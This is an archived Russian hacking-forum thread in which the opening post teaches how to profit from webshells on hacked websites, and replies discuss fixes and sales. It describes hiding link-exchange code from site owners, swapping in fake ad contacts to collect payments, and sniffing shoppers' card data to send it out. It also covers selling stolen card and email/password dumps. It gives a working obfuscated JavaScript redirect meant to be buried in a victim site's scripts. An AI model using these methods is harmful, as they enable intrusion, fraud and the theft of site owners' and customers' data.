PDA

Просмотр полной версии : Мастеркласс в монетизации шеллов

FlooP1k
07.10.2010, 05:40
Описание свежего мануал по монетизации шеллов на линкобирже находится на сайте: http://kidsec.ru

Сам мануал больше не поддерживается и стал полностью бесплатным, последнюю версию от 06.2015 года, можно скачать по ссылке: http://kidsec.ru/msh/newmonshe.zip

Я далеко не писатель поэтому мне тяжело правильно изложить свою мысль так что сильно за это не пинайте.

И так я решил более подробно расписать способы монетизации шеллов.

Так не хочу тут вмещать большую пред историю поэтому сразу начну.

Я разделил способы на 2 категории это соответственно траффистые и с высокими показателями ТиЦ и ПР.

И так поехали:

Высокие показатели ТиЦ и ПР.

Биржи ссылок и статей:

Конечно же первый способ это биржи ссылок, рассмотрим только гигантов этой процветающей ниши - Сапу и Линкфид.

Глупо создавать папки в корне сайта с этими 20-ти символьными названиями которые требует сапа и линкфид, можно же нанять программиста и сделать более простой код ...

Ладно шучу не кого нанимать не надо, все давно уже сделано и изюзанно, так что просто берем с тарелочки.

Эм код не поместился но я залил на sendspace:

сылка (http://www.sendspace.com/file/ba2s6r)

И так для начала заменяем слова ВАШ КОД ЗДЕСЬ (если точнее они находяться на 122 и 318 строчке), на ваш код в бирже, его соответственно берем в самих биржах для каждого аккаунта он разный.

Сохраняем этот код в файл и пихаем по глубже так что бы админы не докопались, только ж не забудьте куда положили.

Теперь ищем место где будут наши ссылки и вставляем в него следующий код:

Вместо /images/img.php соответственно пишем путь к нашему скрипту.

Теперь ваши ссылки будут выводиться под тэгом

То есть на сайте ваши ссылки видны не будут, это для того что бы нас не запалили админы. Администрация Линкфид вобще на это не жалуется, но вот в сапе если поступит абуза на вас то просто сайт уйдет в режим "Не прошел модерацию"

пока не снимите этот самый тэг, а главное доход то с сайта все равно идет.

Для статей есть хороший сайт liex.ru (его юзать если вы уже установили сапу и линкфид на сайт), если нет получается установить сапу и линкфид по каким либо причинам тогда идем в миралинкс там выше цены и спрос, но не принимают сайты с установленными кодами бирж ссылок.

gogetlinks.net:

Есть еще прекрасный сервис называется gogetlinks.net а прелесть его в том, что мы продаем вечные ссылки примерно от 200 рублей за штучку (это если тиц от 100), единственное условие в индексе яндекса должно быть больше 100 страниц,

ну и конечно они говорят что не принимают тоже сайты с биржами ссылок (но это все трындежь, у меня лично все приняли даже не заикнулись). Продавать на одной странице можно только одну ссылку. Спрос большой, если сайт в ЯК

и средняя цена то приходит от 20 заявок в день, а если еще обратным поисков пошурудить, то можно и все 40. Единственный и огромный минус там холд в 3 месяца, в смысле после регистрации можно заказать выплату только через 3 месяца,

это плохо но не смертельно, можно купить аккаунт или найти СЕОшника который будет под процент все ставить выводить и т.д.

UPDATE 03.02.2011: В гогетлинкс ввели дополнительную проверку, теперь нужно подтвердить заявку на емейле указном в WHOIS при регистрации сайта или иметь перс аттестат. Но не забываем, что есть альтернатива: REFAD.NET не тестил но отзывы хорошие ...

Разработка скриптов:

Я лично ставлю в сапу только сайты с тиц от 100, в остальные запихиваю свой скрипт (я его вылаживать не собираюсь, так как нормально оплатил за него), он чем то похож на систему бирж, в footer сайта вставляется код который

принимает запросы, запросы отдаются с главного скрипта находящегося у меня на сервере. Для чего это нужно, да все просто если вы продвигаете какой либо сайт, просто впихиваете ссылку на свой сайт в скрипт и он рассылает по

всем сайтам, и то есть вы сразу имеете ссылки со всех сайтов взломанными вами мелких сайтов, у меня их не малое количество поэтому получается не хилый проспам, а главное это не гавносайты которые прогоняются тем же хрумером.

По этому получаем не хилое продвижение + тиц.

Если же вы не увлекаетесь белым СЕО то данную сеть можно продать, или предоставлять услуги 1 ссылка на 1000 сайтах = 50=100$ если все правильно организовать то не хилый приток желающих нахлынет.

Дорвеи:

Дорвеи описывать не собираюсь, потому что в рунете из за огромного количества хороших белых сайтов и быстро развивающихся АГС систем яндекса, они если не вымерли то находятся на грани. Можно конечно гнать траффик

с гугла, но конверт в разы меньше и тут нужно брать только количеством, а это вобще не интересно. Честно вам скажу лучше не беритесь, если и работать с дорами то только в бурж. Хотя в бурж впихнуться очень тяжело, как минимум вам

нужен СЕОшник который готов работать 50 на 50, на вашем ломе, но люди которые сейчас на это соглашаются в основном нюбы которые будут вешать вам шлемы "та я пальцем двери открываю" и т.д.,

потому что тем кто действительно могут войти в топ и т.д., им попросту не нужен партнер они могут купить лом и так и им по просто не зачем с вами делиться.

Траффистые.

Редирект и баннеры:

У меня слёзы проворачиваются когда я вижу на больших порталах как люди ставят ифреймы на какую то связку и просто гробят шелл.

Зачем нам те копейки траффика на связку если можно получить намного больше проффит на живом траффике с этого сайта.

И так для начала смотрим тематику сайта, если это более коммерческие - страховка, авто, недвижимость можно гнать траффик чисто на

партнерку допустим тот же "Каско", если развлекательный, адалт и т.д. можно сливать на платники по секс знакомствам (сейчас их уже тысячи), различных онлайн игр с оплатой за регистрацию и т.д.

Для этого для начала нужно изучить сайт, если на нем есть тизерные блоки, например слева и справа, регистрируемся в тизернет или подобных составляем оформление точно такое же,

как и на сайте и заменяем допустим левый блок своим (администраторы не так быстро замечают подставу иногда даже сливается месяцами).

Дальше смотрим баннеры какие установлены на сайте добавляем свои (в большей части баннеры выводятся с помощью кмс) поэтому мы просто добавляем свои баннеры которые будут лить на наши партнерки.

Если это варезник, то просто берем 1 файл любой, желательно назвать его допустим soft_358.rar заливаем на депозит и летибит, и в шаблон сайта вставляем примерно следующее:

Скачать эту программу через леттибит и соответственно ссылка и тоже самое с депозит. Тут профит конечно же зависит от посещаемости сайта.

Есть еще платнички файловые, вобщем думаю тут объяснять не надо, там более приманчивая кнопка (Скачать на большой скорости и т.д. и т.п.) после того как человек скачивает

и пытается установить то ему высвечивает отправьте смс для того что установить и вам конечно же падает процент от этой смски.

Так идем дальше есть еще жестокий способ, это редирект. Если поставить сразу редирект на какую то страницу то конечно же администрация быстро обламает ваши затеи.

Для этого используем простейщий javascript:

functionR(){varRef=document.referrer;if(Ref.indexO f('.google.')!=-1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"')}else{document.write('.')}}R();

Из кода мы конечно же видим, что любой человек пришедший из google, yandex, yahoo и т.д. вобщем то есть из поисковика пересылается на нашу страницу которую нужно указать в скрипте.

Админ сайт логично заходит на свой сайт через закладки и его не редиректнит и по статистике его сайта не упадет посещаемость. Лучше еще запрятать этот самый код в уже существующий javascript, просто открываем страницу

смотрим какие .js скрипты вызываются на всех страницах, добавляем в конце этот код и получаем профит.

Если вы пытаетесь монетизировать большие порталы с посещаемостью от 20к, тут лучше не спешить, по подробнее изучить все разделы сайта (тут действует поговорка 7 раз отмерь, 1 раз отрежь), у меня некоторые порталы уже по пол года держутся

хоть и приносят 20-50$, зато за месяцы накапливается не хилый доход и это в сотню раз лучше, чем бы я туда просто впихнул фрейм и получил бы максимум 50$ фрейм бы убрали и несли бы мне шелл.

Подмена:

Это уже можно считать за не большой развод, и тут нужна сноровка при общении (хотя как посмотришь на раздел Кидалы разных форумов, то сразу видно что это у вас хорошо получается).

И так баннер на портале с посещаемость 10к+ стоит от 500$ в месяц, у каждого сайта есть страничка где они предлагают места под баннера, расценку и внизу контактную информацию.

Ну конечно же мы контактную информацию меняем на свою и сами принимаем заказы. Желательно просить деньги в Яндекс.деньгах, потому что их легко перевести на вебмоней и дальше можно не бояться, что нас забанят или что то такое.

Если нет Яндекс.денег то тут уже вольная фантазия можно зарегистрировать кошелек через дедик, после получения денег перевести их на другую платежную систему, а от туда уже обратно на вебмоней только на свой кошелек.

Конечно же можно подменять информацию не только в разделе реклама, но все зависит от сайта и его тематики, думаю мысль вы поняли дальше найдете сами.

Так же если это буржуйский сайт, допустим какой то интернет-магазинчик пишем не большой пхп шпиончик, добавляем в скрипт что бы при заполнение человеком данных для покупки, все данные и соответственно информация о кредитке высылались вам куда то

на сервер. Можно и не кредитку, а любая интересующая вас инфа с пользователей этого сайта.

Слив базы данных и другое:

Кредитки: Ну за кредитки тут все ясно, если вы взломали буржуский магазинчик, то дампим таблицу 'orders' и ищем там кредитки. USA кредитки довольно дешевые сейчас, больше ценится европа. Очень желательно что бы кроме номера и exp

кредитки был еще CVV2 код это трёх значное число. Если в базе его нет, то такой дамп будет стоить в несколько раз дешевле, кстати о расценках USA с cvv2 примерно от 300$ за 1к (если хороший валид), европа (зависит от стран и валида)

примерно от 1к$ за 1к. Тут я рассказывать не буду на теме кредиток останавливаться очень на долго, тем более накапливать себе конкурентов.

Мейлы: Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей, если зашифрован то тут уже ищем проги

для масс брута.

Рассылка: Во многих CMS есть рассылка писем от имени администратора, так же можно разослать письма с рекламой вашей партнерки.

Сплоги: Еще если это опять же варезник или адалт сайт, сливаем базу данных именно постов сайта, прогоняем ее через какой то синомайзер и получаем самый, что не на есть "сплог" (подробнее о слогах можно найти в гугле), регаем сайтик ставим

такую же CMS как и у взломанного сайта, заливаем дамп базы и опля мы имеем не плохой траффик который потом можно монетизировать, как душе угодно.

Порталы: Обычно сайты с хорошим траффиком это различные порталы написанные на самописнном движке, или же умело переделанные под известные вордпрессы, ДЛЕ и т.д. Такие движки и шаблоны хорошо ценятся среди СЕОшников,

я бы сам не прочь купить какой то движок городского портала или что то подобное, это экономит не только деньги а и время, нервы. Можно выгодно продать ...

Если честно я до сих пор поражаюсь в ценах на шеллы, по моим меркам они должны стоить в разы дороже ...

Вот и подошла к концу моя не большая статейка, если будут какие то вопросы или дополнению - выслушаю, исправлю.

Спасибо вобщем за внимание.

Автор: FlooP1k специально для Античат.

tracy
07.10.2010, 07:24
Аналогичная статья /thread220472.html

shellz[21h]
07.10.2010, 12:23
Мейлы: Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей, если зашифрован то тут уже ищем проги
для масс брута.

emailass c шопов можно чекнуть на палку, и все это дело толкнуть куда дороже ))

illiada08
07.10.2010, 12:25
не работает javascript для редиректа

FlooP1k
07.10.2010, 16:50
Аналогичная статья /thread220472.html

хмы к чему вы это написали? Аналогичная? Чем, не чего похожего я не вижу ...

Ява скрипт не может не работать, так как код перепроверил все нормально, может вы его не правильно вызвали?

d1v
07.10.2010, 17:07
статья гуд, но смутил один момент, касаемый редиректа. при таком подходе сайт вылетает из индекса довльно быстро.

den1skA
07.10.2010, 17:31
Про биржи ссылок понравилось больше чем у DeluxeS.

Да и в целом статья написана более подробней.

M@rtein
19.10.2010, 16:08
Статья очень хорошая.

Но не согласен насчет скрипт удаленного размещения ссылок - точнее с тем то что это о дорого стоит.

Сам года 2 назад заказывал - состоит из 2-ух файлов php.

Один у себя на хостинге размещаешь, и указываешь путь до второго, второй размещаешь на жертве и инклудишь в футер шаблона.

Стоимость 20wmz макс.

Автор есть сложность с поиском покупателей на базы карточек с инет-шопов? Если не сложно ответь в личку.

FlooP1k
21.10.2010, 07:02
Статья очень хорошая.
Но не согласен насчет скрипт удаленного размещения ссылок - точнее с тем то что это о дорого стоит.
Сам года 2 назад заказывал - состоит из 2-ух файлов php.
Один у себя на хостинге размещаешь, и указываешь путь до второго, второй размещаешь на жертве и инклудишь в футер шаблона.
Стоимость 20wmz макс.
Автор есть сложность с поиском покупателей на базы карточек с инет-шопов? Если не сложно ответь в личку.

Не ну смотря как написать скрипт если просто размешалась ссылка в футере то тогда да, а мой скрипт как сапа определяет страницы и футер на одной странице показывают одну ссылку, а на другой другую ...

spiderbuber
25.10.2010, 10:36
Почему-то комментарии в скрипте все покоцанные

// +П+о+ж+а+л+е+й+-+е +н+а+¬ +-+е+-+в+е+- :+о)

zeppe1in
27.10.2010, 18:26
FlooP1k

как бабло с бирж выводим? и что насчёт абуз от админов сайта?

http://www.linkfeed.ru/blog/?p=203

FlooP1k
28.10.2010, 23:17
FlooP1k
как бабло с бирж выводим? и что насчёт абуз от админов сайта?
http://www.linkfeed.ru/blog/?p=203

Вобще в сапе если абузу подаст один из оптимизаторов, то ваш сайт уйдет в статус "Не промодерирован", а в качестве ошибки укажут что нужно сделать видимые ссылки (прикол в том что деньги и дальше продолжают капать). А линкфид это вобще смешно, мне кажется самая немодерируемая биржа ссылок, там хоть сайт vkontakt добавь, им все равно не одна неделя понадобиться что бы понять что произошло ...

zeppe1in
29.10.2010, 02:08
FlooP1k

я имел ввиду абузы от админа того сайта на котором стоят наши ссылки)

FlooP1k
29.10.2010, 12:14
а ну я незнаю, у меня пару раз было такое что сайт с акккаунта просто пропал, пытаешься добавить еще раз пишет сайт уже есть в системе ... Может из за абузы админы переносят к нему в аккаунт или что то такое, хотя это как то глупо на счет этого я незнаю (

spiderbuber
03.11.2010, 10:35
FlooP1k, а есть ли аналогичный код для бирж gogetlinks и trustlink?

FlooP1k
03.11.2010, 18:18
FlooP1k
, а есть ли аналогичный код для бирж gogetlinks и trustlink?

Для gogetlinks не нужен код, а трастлинком не пользовался еще незнаю ... Там в принципе не сложный код можно переписать под трастлинк, но у меня времени нет и я не программист для меня это все долго и нудно будет (

KaelMan
05.11.2010, 11:24
Статья супер,узнал много нового,спасибо.

spiderbuber
08.11.2010, 12:08
На линкфиде все ссылки со всех плащадок уходят в еррор и в сапе 90% ерроров. В коде кроме своих ИД никаких настроек не менял.

Ошибка происходит из-за того, что ссылки оказываются вне тегов html и body

Т.е. при просмотре кода будет примерно так:

анкор

...

Подскажите как поправить ситуацию?

FlooP1k
10.11.2010, 18:15
отвечал уже в пм ... по правилам бирж код должен быть между тэгами и так что настраивайте

barin1377
23.11.2010, 20:06
интересная статья, узнал новое

fl00der
25.11.2010, 11:19
Вопрос, как монетизировать EDU шеллы? Т.е. какая цена на них, я так понял, они ценятся выше обычных? И смежный вопрос, сайты в нац.учебных зонах типа edu.jp, edu.lb ценятся также, как и EDU, либо выше обычных, либо как обычные?

FlooP1k
25.11.2010, 18:16
Вопрос, как монетизировать EDU шеллы? Т.е. какая цена на них, я так понял, они ценятся выше обычных? И смежный вопрос, сайты в нац.учебных зонах типа edu.jp, edu.lb ценятся также, как и EDU, либо выше обычных, либо как обычные?

Очень ценятся зоны .edu, .mil, .gov ... Монетизируют исключительно дорвеями и различными СЕО штучками. Цена обычно от 80$. Самому лучше не пытаться монетизировать, врядли у вас что то получиться в большинстве случаем вы просто потеряете шелл.

edu.jp, edu.lb насколько я знаю ценятся как и обычные шеллы ....

Mahasamatman
26.11.2010, 17:35
Проблема многих форумов на "хаккерскую" тематику заключается в том, что люди, обладающие неким, явно недостаточным опытом даже для собственной успешной деятельности, начинают учить других.

Это серьёзная проблема - так как то, что обсуждается в этой статье - относительно серьёзная область, которая не терпит "дилетантского" подхода.

Я выкупаю значительный объем шеллов каждый день.

И ежедневно я вычищаю с площадок мусор, неудачную попытку поставить какую-либо говнобиржу, ифрейм, или восстанавливаю площадки, загубленные неправильным инклудом.

Это всё - результат того, что человек набрался отрывочных знаний по подобным статьям, и пошел нарушать закон.

Возможно, в большинстве случаев это никак не отразится на их дальнейшей судьбе, но на многих площадках люди оставляют кучу следов. Свои хостинги, идентификаторы бирж, порой кошельки платежых систем, айпи тдс, и прочее. В сумме - это достаточный набор для выяснения личности кулхакера, особенно учитывая тот фактор, что человек, который совершал такие "неквалифицированные" действия, вряд ли имеет подобающую инфраструктуру для этого - сейчас я говорю об обеспечении собственной безопасности.

Эта тема - яркий пример всего вышеописанного.

Например, вот:

На линкфиде все ссылки со всех плащадок уходят в еррор и в сапе 90% ерроров. В коде кроме своих ИД никаких настроек не менял.
Ошибка происходит из-за того, что ссылки оказываются вне тегов html и body
Т.е. при просмотре кода будет примерно так:
PHP код:
анкор
...
Подскажите как поправить ситуацию?

Человек явно не имел никакого опыта работы с биржами ссылок, но сразу лезет ставить ссылки на чужую площадку. Кстати, не читая ни справок, ни форума соответствующей биржи, где уже давно решено большинство типичных проблем.

Или:

Вопрос, как монетизировать EDU шеллы?

Что можно ответить на такой вопрос? Можно, конечно, написать пару параграфов текста об особенностях работы некоторых поисковых систем, но какой толк? Человек не поймет, или не сможет воспользоваться этой информацией - у него нет нужной информационной базы в голове, иначе бы такого вопроса не возникло в принципе.

Друзья, мой вам совет: не лезьте пока в это. Лучше, читайте максимум информации о том, каким образом вообще можно заработать деньги в интернете. Читайте, думайте, делайте, анализируйте.

И начните лучше с белого. Сделайте несколько сайтов, продвиньте их, попробуйте монетизировать. Попробуйте сделать это правильно, чтобы появился результат. И потом, когда все встанет на свои места - только тогда следует задуматься о неких дополнительных "бонусах", которые можно получить, используя черную оптимизацию, и шеллы как инструмент для этого.

Нельзя сразу сесть за штурвал, к примеру, истребителя и полететь на перехват.

Сначала нужно научится летать, например, на кукурузнике. Потом - на чем-нибудь из малой гражданской авиации, и только потом - садится за руль боевой машины. Иначе, можно нажать не ту кнопку, и произойдет взрыв.

В наших терминах - к вам придут, заберут все оборудование, а после дадут два года условно. Это в лучшем случае.

Подумайте, это - не пустые слова. И лучше не лезьте, если чувствуете, что что-то не понимаете.

FlooP1k
26.11.2010, 18:30
Проблема многих форумов на "хаккерскую" тематику заключается в том, что люди, обладающие неким, явно недостаточным опытом даже для собственной успешной деятельности, начинают учить других.
Это серьёзная проблема - так как то, что обсуждается в этой статье - относительно серьёзная область, которая не терпит "дилетантского" подхода.
Я выкупаю значительный объем шеллов каждый день.
И ежедневно я вычищаю с площадок мусор, неудачную попытку поставить какую-либо говнобиржу, ифрейм, или восстанавливаю площадки, загубленные неправильным инклудом.
Это всё - результат того, что человек набрался отрывочных знаний по подобным статьям, и пошел нарушать закон.
Возможно, в большинстве случаев это никак не отразится на их дальнейшей судьбе, но на многих площадках люди оставляют кучу следов. Свои хостинги, идентификаторы бирж, порой кошельки платежых систем, айпи тдс, и прочее. В сумме - это достаточный набор для выяснения личности кулхакера, особенно учитывая тот фактор, что человек, который совершал такие "неквалифицированные" действия, вряд ли имеет подобающую инфраструктуру для этого - сейчас я говорю об обеспечении собственной безопасности.
Эта тема - яркий пример всего вышеописанного.
Например, вот:
Человек явно не имел никакого опыта работы с биржами ссылок, но сразу лезет ставить ссылки на чужую площадку. Кстати, не читая ни справок, ни форума соответствующей биржи, где уже давно решено большинство типичных проблем.
Или:
Что можно ответить на такой вопрос? Можно, конечно, написать пару параграфов текста об особенностях работы некоторых поисковых систем, но какой толк? Человек не поймет, или не сможет воспользоваться этой информацией - у него нет нужной информационной базы в голове, иначе бы такого вопроса не возникло в принципе.
Друзья, мой вам совет: не лезьте пока в это. Лучше, читайте максимум информации о том, каким образом вообще можно заработать деньги в интернете. Читайте, думайте, делайте, анализируйте.
И начните лучше с белого. Сделайте несколько сайтов, продвиньте их, попробуйте монетизировать. Попробуйте сделать это правильно, чтобы появился результат. И потом, когда все встанет на свои места - только тогда следует задуматься о неких дополнительных "бонусах", которые можно получить, используя черную оптимизацию, и шеллы как инструмент для этого.
Нельзя сразу сесть за штурвал, к примеру, истребителя и полететь на перехват.
Сначала нужно научится летать, например, на кукурузнике. Потом - на чем-нибудь из малой гражданской авиации, и только потом - садится за руль боевой машины. Иначе, можно нажать не ту кнопку, и произойдет взрыв.
В наших терминах - к вам придут, заберут все оборудование, а после дадут два года условно. Это в лучшем случае.
Подумайте, это - не пустые слова. И лучше не лезьте, если чувствуете, что что-то не понимаете.

Возможно так оно и есть, но на счет органов вы не правы. Похоже вы еще не сталкивались с этим близко. Пару лет назад у меня был белый хороший проект, на счет безопасности я вобще не волновался и даже не задумывался. И логично рано или поздно его взломали и засунули в сапу, я потер код и конечно разозлился, после этого еще раз через неделю стоит опять же этот же код. Я уже злой написал в сапу его аккаунт заблокировали (наверно), но IP хакера отказались давать и я обратился в милицию, тонны бумаг и болтавни (как ты объяснишь человеку который наверно в косынку не с первого раза заходит) что такое биржа ссылок и какой вред нанесли моему сайту.

Вобщем потом мы уже начали говорить все честно в лицо, он сказал что если хакер с другого города а тем более страны это затянется на несколько недель и просто спросил стоит ли вобще все это делать?

Я и забил, а смысл ... Тут еще не факт что он получит по заслугам. На такие мелкие можно сказать "хулиганства" врядли кто будет реагировать ...

kot777
26.11.2010, 22:18
Хорошая статья, некоторые пункты позволяют легко получить условное наказание (до 2-х лет), при этом целых 3 рубля заработать можно, дерзайте.

По чужим кодам сапы уже кстати возбуждают уголовные дела, и есть уже прецеденты, слишком уж легко вычислить

aX0en
27.11.2010, 01:13
среди знакомых или где-то в сми было?

Steam[777]
27.11.2010, 10:03
Задержание - задержанием.После задержания дело еще до суда надо дотянуть.И каков был результат?

fl00der
27.11.2010, 12:54
Mahasamatman

А если не делать всего того, о чем толкует ТС, а просто продавать, например, тебе? Ясное дело, юзать VPN/SOCKS и все такое, да и работать по другим странам (ведь даже тех, кто "прославился" не всегда сдают)? Да и, по идее, искать потом будут именно того, кто купил, ведь он (ты, Mahasamatman) будет уже производить действия с сайтом после взломщика.

Хз, я думаю, что делать запрос, например, в Австралию, из-за какого-то шелла, который потереть 5 минут, это мало кому надо. К тому же, я, например, винил бы исключительно себя в Этом, т.к. я не смог защитить свой сайт.

У меня, например, есть друган, у него был сайт. Ну залили туда шелл, мы его (шелл) потерли и заткнули дыры в движке. А обращаться в Полицию мы, наверное, сами бы зассали, да и нам тогда даже 18 не было.

А если так присрется заниматься тем, что советует ТС, можно регать акк в Сапе также с анонимного IP, а кошель регать на подставное лицо (в инете стоит, кажется, пару баксов или около того). Я думаю, что если не атаковать Яндекс или сайт Медведева, то надо постараться, чтобы тебя нашли.

FlooP1k
27.11.2010, 15:06
ну как бы если уж так начинать, то за продажу шеллов можно получить больше срок, там еще припишут (сбыт в крупном объеме и т.д.)

Я лишь описал несколько способов по монетизации, только из за того что меня достали люди которые на таких вкусных ресурсах ставят своих ифреймы и после этого над этим ресурсов начинается жесткий контроль. Просто хотел доказать, что не трафф единым цениться шелл.

Если это будет здравый взрослый человек он поймет как лучше сделать и не спалиться, если это будет какой то школьник то и слава яйцам, после приезда милиции он забьет на эту идею стать "хакером" и будет работать на нормальной работе или же в белом СЕО. Заниматься этим "хакерством" с одной стороны хорошо ты имеешь намного больше денег чем твои сверстники, но и в тоже время иногда сидишь просто как на иголках, когда видишь то машину милиции под твои подъездом то что либо подобное, хоть и знаешь что врядли когда нить спалишься и что ты юзаешь мощные защиты какие то, да и не такое уж ты и преступное дело делаешь, но все равно маленькая параноя есть ...

Steam[777]
27.11.2010, 17:21
В общем, Mahasamatman, во многом прав, и отдельно стоит обратить внимание на

В сумме - это достаточный набор для выяснения личности кулхакера, особенно учитывая тот фактор, что человек, который совершал такие "неквалифицированные" действия, вряд ли имеет подобающую инфраструктуру для этого - сейчас я говорю об обеспечении собственной безопасности.

Лезть туда не имея представлений о криптографии, УК, методах работы ребят из правоохранительных органов, и не имеея четких представлений что делать когда за Вами придут - есть глупо. И "школьники" такими знаниями не располагают точно

Voinmraka
06.01.2011, 01:42
есть шел посещаемость 15000+ что с ним делать? как получить доход?) желательно быстро)) раньше не работал с такими сайтами...

Zorgus
07.01.2011, 22:03
FlooP1k, Спасибо за статью.

Тестил твой скрипт sape+linkfeed, работает хорошо.

Инфо для тех, у кого проблемы с кодировкой:

По умолчанию во всех системах стоит WINDOWS-1251.

На linkfeed все просто, заходим в настройки сайта и там выбираем кодировку на UTF-8

На sape такого к сожалению нету, по этому нужно подправить код.

Для этого находим строку в скрипте 1007

$sape= newSAPE_client();

И заменяем ее на:

$o['charset'] ='UTF-8';

$sape= newSAPE_client($o);

unset($o);

Что бы быстро кодировка вступила в силу удалите файлы links.db и linkfeed.links.db

5FeRa
08.01.2011, 00:08
есть шел посещаемость 15000+ что с ним делать? как получить доход?) желательно быстро)) раньше не работал с такими сайтами...

Поставь ифрейм и продавай траф или продай шелл.

wwwROOT
08.01.2011, 14:48
статья хорошая, а по поводу закона - договорился с человеком, чтобы разместил у себя на сайте мой код, а оказалось, что сайт не его, его и ищите

Radiator
08.01.2011, 23:56
много утт подводных камней.

статья напомнила статью Deluxes

Voinmraka
09.01.2011, 14:53
никто не знает где почитать о дорах на ломе? или получить консультацию?

Светлый
25.01.2011, 00:51
Если уж рассматривал gogetlinks, странно что не упомянут миралинкс, с него можно и больше дохода поиметь. Единственный трабл с этой системой - должна быть ссылка на каталог статей с морды, что уже само по себе есть палево. Но не большее, чем размещение открытых ссылок на страницах в гогетлинксе. А вообще приведенные схемы не самые прибыльные, можно получать больше если включить фантазию, по максимуму использовать знание php и не лениться.

tukiwin
03.02.2011, 14:01
у кого нибудь код работает? если да? подскажите мне что у меня не так, за $ естественно, аська 626990671

Steam[777]
03.02.2011, 15:30
Отличная статья.

Но, хочется дополнить немного.

Совсем недавно gogetlinks ввела доплнительную проверку при добавлении площадки - теперь необходимо подтверждать права через email, указанный в WHOIS, а если такой информации получить не удается - то надо иметь перса WebMoney.

Конечно, это не проблема,просто немного усложнит монетизацию подобных шеллов (и принесет гораздо меньше денег владельцам gogetlinks ), но стоит иметь это ввиду.

_Logger_
19.02.2011, 13:23
ваше нечего не понял.... пишет каким то незнакомим языком...

Bramin
23.02.2011, 03:02
sape отлично работет со скриптом, а вот с linkfeed проблема. сайты не добовляются в систему, у кого были подобные проблемы?

FlooP1k
28.02.2011, 18:05
sape отлично работет со скриптом, а вот с linkfeed проблема. сайты не добовляются в систему, у кого были подобные проблемы?

Может вы не правильно вставили код от линкфида? я даже незнаю какая еще проблема может быть))

leftr
03.04.2011, 18:39
на английском сайте, русские анкоры в козебрялках.

что-то с кодировкой видимо, как решить кто-нибудь знает?

p.s. а то linkfeed ошибку выдает про неправильно отображенный анкор.

N@b$ter
03.04.2011, 19:28

Такая же прабла вроде на 124 строке должен быть код линкфид вставляю но линкфид не видет и всё тут

Steam[777]
03.04.2011, 19:31
на английском сайте, русские анкоры в козебрялках. что-то с кодировкой видимо, как решить кто-нибудь знает? p.s. а то linkfeed ошибку выдает про неправильно отображенный анкор.

Замени

var $lc_charset = 'DEFAULT';

на

var $lc_charset = 'utf-8';

.links.db не забудь удалить

sevenup
24.04.2011, 16:33
А кто-то пробовал вставлять этот скрипт для сапы и линкфид на сайты написанные на ASP ?

Если да, то поделитесь пожалуйста кодом

попугай
24.04.2011, 19:01
А кто-то пробовал вставлять этот скрипт для сапы и линкфид на сайты написанные на ASP ?
Если да, то поделитесь пожалуйста кодом

На linkfeed кода для ASP-сайтов нет, на сапе может быть есть, так как биржа более популярная, но я там не зарегистрирован, поэтому не знаю.

Но никто не мешает переписать код самому или нанять человека, который перепишет с PHP на на любой другой язык, используемый в ASP-скриптах.

xpxp
28.09.2011, 23:51
function R(){var Ref=document.referrer;if(Ref.indexOf('.google.')!= -1||Ref.indexOf('.bing.')!=-1||Ref.indexOf('.yahoo.')!=-1||Ref.indexOf('.aol.')!=-1||Ref.indexOf('.ask.')!=-1||Ref.indexOf('.altavista.')!=-1||Ref.indexOf('.yandex.')!=-1){document.write('docu'+'ment.location="http://Сайт-нашой-партнерки-куда-лить-трафф.ru/"')}else{document.write('.')}}R();

При переходе с яндекса почему то не редиректит

BLurpi^_^
16.11.2011, 00:50
всместо яваскрипт редиректа лучше юзать редирект через htaccess,тогда если админ имеет доступ только к админке он не сможет убрать редирект

я 1 раз так сделал и на том сайте 3 дня редирект повисел,сливал на платник по скидкам,800рублей с 1к уников)

Bramin
19.11.2011, 17:32
кто-нибудь все-таки смого решить проблему с линкфидом при добовлении нового сайта?? бьюсь головой об стену..

Kamazik
23.11.2011, 17:02
у кого-нибудь есть опыт монетизации шелов на бурж биржах линков типо сапы

отблагадарю шелами щедро

айсикью 267042

Crazy Bastar
27.11.2011, 10:22
Хм.. вроде все норм, но ссылки почему-то еррор (не в body), хотя код идет так

сцылка...

dimonx15
02.12.2011, 13:13
Про сапу забудьте

Mail2k
04.12.2011, 00:46
В сапу не добавляется сайт с установленным из 1-го поста скриптом.Хотя прописанный слой в исходнике страницы выводит. Скрипт необходимые файлы создает.

Сапа пишет: Код на сайте не установлен

Что не так делаю?

bugagasenki
15.01.2012, 17:24
Хорошая статья, некоторые пункты позволяют легко получить условное наказание (до 2-х лет), при этом целых 3 рубля заработать можно, дерзайте.
По чужим кодам сапы уже кстати возбуждают уголовные дела, и есть уже прецеденты, слишком уж легко вычислить

палишся и кто после этого впн из подписи будет использовать да и на бсс у тебя фотка в форме..

ты где год то пропадал?

ocheretko
15.01.2012, 23:06
Если сделать копию сайта, и в роботс.тхт прописать новый домен? Таким макаром как я понимаю можно угнать себе сайт

VyRq
27.01.2012, 12:53
Если сделать копию сайта, и в роботс.тхт прописать новый домен? Таким макаром как я понимаю можно угнать себе сайт

таким образом получится зеркало сайта, подробней тут: http://help.yandex.ru/webmaster/?id=995297

Adrenaline11
17.03.2012, 22:15
Поставил код, бот линкфида зарегистрировал в ОК 1500 страниц, но ссылки не выводятся, юзаю скрипт автора. Ссылки приняло некоторые и статус NEW стоит, деньги не идут чтото. заплачу 10 $ тому кто объяснит в чем дело. icq 233444

Объясните в чем дело

Pirotexnik
07.04.2012, 23:13
Мейлы:
Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей

Эээ, есть дамп адалта, ~100к мыл с открытым пассом.

Тоесть это минимум пол лимона? :/ :\

Куда например продавать дампы забугора?

Jakeroid
09.05.2012, 17:36
Не проходит проверку с твоим кодом на LinkFeed. Пишет: "код на главной странице не найден". Хотя он там 100% есть, даже сапа схавала и все работает.

Куда копать?

FlooP1k
09.05.2012, 18:20
